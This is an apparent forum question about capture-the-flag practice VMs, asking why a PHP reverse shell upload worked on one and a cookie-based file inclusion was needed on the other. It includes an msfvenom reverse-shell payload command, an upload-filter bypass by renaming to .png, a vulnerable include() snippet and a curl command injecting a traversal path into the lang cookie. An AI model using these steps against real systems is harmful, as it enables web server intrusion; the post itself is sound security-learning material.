Help Understanding PHP Reverse Shells

I have recently done two different hackable VMs and had to take, after reading walkthroughs, two different approaches.

For Fristileaks 1.3, it was simple. I was able to get login credentials to the website and upload a php reverse shell. I used msfvenom for the script:

msfvenom -p php/meterpreter/reverse_tcp LPORT=xxxx -f raw > shell.php  

I had to rename the script from shell.php to shell.php.png because the site only let me upload pictures. Once I uploaded the script, I found the url for the picture/script, set up a netcat listener on my attacking machine, and then visited the page with the script and that was enough to establish a connection between the target and attacker.

It was much more difficult to establish a connection on the Pwnlab Init VM.

Again, I gained login access to the website’s upload page. I tried uploading the same reverse shell script but I was not able to get access after setting up a netcat listener.

What I had to do, ultimately, was upload a php backdoor script:


Then, I had to exploit the below vulnerability on the index.php page, which allows for injection into the lang cookie

if (isset($  _COOKIE['lang'])) {         include("lang/".$  _COOKIE['lang']); } 

I then used the below curl query to pass the page with the uploaded php backdoor to the lang variable, and then netcat to my attacking machine, which I had already set to listen for a connection

curl --output - -b lang=../upload/6a8c0c37efded4d620a5c59990f07b90.png 

Can anybody shed any light on why it was so easy to establish a reverse shell in one instance and more involved in another? What is going on behind the scenes in the Pwnlab VM such that visiting the URL with the uploaded reverse shell script does not work, but exploiting the lang variable with a PHP backdoor is sufficient?

I suppose you just need to have a lot of tools at your disposal and keep trying until something works, but it would help to have a concept of why one approach works and another doesn’t.